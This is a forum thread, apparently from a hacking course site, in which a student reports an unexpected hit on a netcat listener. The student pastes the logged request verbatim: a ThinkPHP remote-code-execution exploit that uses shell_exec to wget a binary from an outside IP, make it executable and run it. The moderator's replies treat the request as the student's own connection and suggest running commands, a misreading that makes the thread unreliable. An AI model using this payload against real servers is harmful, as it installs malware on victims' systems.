Viewing 4 posts - 1 through 4 (of 4 total)
  • Author
    Posts
  • February 3, 2020 at 10:16 pm #30026
    MJ
    Participant

    I ran the Bash command listener being nc -vv etc from m kali VM and I got back this:

    connect to [192.168.1.10] from 114-39-236-143.dynamic-ip.hinet.net [114.39.236.143] 10275
    GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=’wget http://5.152.206.169/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
    Connection: keep-alive
    Accept-Encoding: gzip, deflate
    Accept: /
    User-Agent: Uirusu/2.0

    sent 0, rcvd 320

    I hadn’t started the bash on any other device at this stage so very curious to know what it means? Is someone connecting to me to infiltrate instead of the other way around?

    Please help as got me a little worried.

    February 6, 2020 at 6:01 pm #30150
    Zaid Sabih
    Moderator

    Hello Mj,

    Which bash command are you referring to?

    February 8, 2020 at 9:35 pm #30221
    MJ
    Participant

    this is the listener for the bash being nc -vv -l -p 8080 . referenced in lecture 13.1

    Thanks,

    February 10, 2020 at 4:27 pm #30286
    Zaid Sabih
    Moderator

    Ok so it seems like you got a connection back, did you try running any commands after that?

  • Author
    Posts
Viewing 4 posts - 1 through 4 (of 4 total)
  • You must be logged in to reply to this topic.